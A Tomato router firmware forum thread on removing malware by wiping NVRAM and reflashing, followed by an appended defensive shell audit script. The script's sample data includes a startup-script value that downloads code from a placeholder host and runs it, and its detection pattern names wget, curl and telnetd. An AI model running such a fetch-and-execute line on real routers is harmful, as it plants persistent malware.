remove Rootkit or other malware?

Discussion in 'Tomato Firmware' started by P2q000, May 14, 2019.

  1. P2q000

    P2q000 Network Newbie Member

    Hi

    I wish to flash new version with option "After flashing, erase all data in NVRAM memory". I wish to do this to remove potential malware and rootkits.

    I don't wish to lose settings, so will first back up all settings and restore them after the flash.


    Will this work?
    What do you think? Other ways to do it?
     
  2. eibgrad

    eibgrad Network Guru Member

    Whether it's a good idea to restore from the backup depends on whether the rootkit/malware has or hasn't corrupted nvram as well. Although I know it's a major hassle, when it comes to any firmware updates or rootkit/malware, it's just prudent to reset to factory defaults and rebuild from scratch. In fact, in the case of rootkit/malware, I personally would go so far as to reinstall the firmware too. IOW, wipe absolutely everything and work forward from a known clean state.
     
  3. jerrm

    jerrm Network Guru Member

    Agree with @eibgrad: if you are concerned there has been some sort of malware, then wipe everything. The only thing (easily) writable on the router is NVRAM. For malware to install on the router and persist across a reboot, there are only a few options: rewrite the firmware and/or CFE, modify NVRAM so that scripts are run at startup, or place auto-run scripts on USB attached storage.

    NVRAM modification would be the easiest option that would work with any Tomato version. Restoring the backup would likely be restoring any malware scripts. You also need to make sure any autorun scripts on any USB attached storage are clean.

    I don't know of any exploits that rewrite firmware/CFE under Tomato, but that doesn't mean it isn't a possibility.
     
  4. Monk E. Boy

    Monk E. Boy Network Guru Member

    If you're really paranoid then overwrite the CFE with a known good copy of the CFE, although that will likely require an additional pass through. So first step: boot from CFE, erase NVRAM, flash new firmware, boot into firmware, overwrite CFE, reboot back into CFE, erase NVRAM, flash new firmware, and then set up from scratch. I will say this, though: writing the CFE is very, very, very dangerous. If anything goes wrong your router will be bricked, no longer work, and require a JTAG modification and cable to bring back to life. It's very unlikely the CFE was modified for this reason, because it's very easy for it to go sideways.

    In theory after booting into the new firmware for the first time you could read the CFE to a file, copy that file off, then run a MD5/SHA256/etc. on the file that you then compare with the MD5/SHA256/etc. of what should be an identical unmodified CFE of the same version for the same router. Where you would get that CFE is unknown, most of the time the CFEs aren't readily available or at least available from a trustworthy source. Got a retailer nearby with a no-questions-asked return policy who carries the same make/model?

    It is possible they stuffed data into JFFS or the like, but erasing the NVRAM & writing a new firmware should take care of JFFS, since it's unlikely the same number of bytes were left over in flash for JFFS to use (unless it was, in fact, the exact same firmware).

    Note however that if you backup all your settings and then restore all your settings via a configuration file, whatever you think is in NVRAM now will go right back into NVRAM because the backup is, quite literally, your NVRAM settings. If you're worried about something surviving from before the wipe the safest option is to set it up by hand as eibgrad suggested.
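As an added example, not code from this thread or from the Tomato project: a small POSIX shell audit that reads an `nvram show`-style key=value dump and flags the startup/event script keys jerrm describes, plus any other value that fetches or executes code, so a backup can be reviewed before it is restored rather than putting whatever is in NVRAM straight back. The `script_*` key names, the pattern list and the sample dump are assumptions constructed for illustration.

```shell
# Added example, not code from this thread or the Tomato project: audit an
# `nvram show`-style key=value dump before restoring it, flagging entries
# that could re-establish persistence. Assumptions: Tomato-style script
# variable names (script_init, script_wanup, ...) and the key=value dump
# format; the sample dump at the bottom is constructed for illustration.
# NVRAM keys whose values Tomato runs as shell at boot or on events
# (assumed names; check what `nvram show` lists on your build).
SCRIPT_KEYS="script_init script_shut script_fire script_wanup script_usbmount script_usbumount"
is_script_key() {
  for k in $SCRIPT_KEYS; do
    [ "$1" = "$k" ] && return 0
  done
  return 1
}

# Reads a dump on stdin; prints each suspicious entry on stderr and the
# number of entries needing review on stdout.
audit_nvram_dump() {
  hits=0
  while IFS= read -r line; do
    key=${line%%=*}
    val=${line#*=}
    [ "$key" = "$line" ] && continue   # not key=value, skip
    [ -z "$val" ] && continue          # empty value, nothing to run
    if is_script_key "$key"; then
      printf 'REVIEW (runs at boot/event) %s\n' "$line" >&2
      hits=$((hits + 1))
    else
      # Fetch/exec commands or writable paths in a non-script key are out of place.
      case "$val" in
        *wget*|*curl*|*"sh -c"*|*telnetd*|*/jffs/*|*/tmp/*|*/mnt/*)
          printf 'REVIEW (code in value) %s\n' "$line" >&2
          hits=$((hits + 1)) ;;
      esac
    fi
  done
  echo "$hits"
}

# Constructed sample dump: benign settings, an empty script key, a startup
# script that downloads and runs code, and a stray path hidden in a value.
demo_audit() {
  audit_nvram_dump <<'EOF'
lan_ipaddr=192.168.1.1
wan_proto=dhcp
script_init=
script_wanup=wget -qO /tmp/x http://example.invalid/x; sh /tmp/x
ddnsx0=/tmp/.hidden/run
EOF
}
```

Running `demo_audit` reports two entries for review; on a real router, feed it `nvram show` output (or the decoded backup) and inspect every flagged line by hand before deciding whether to restore.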
     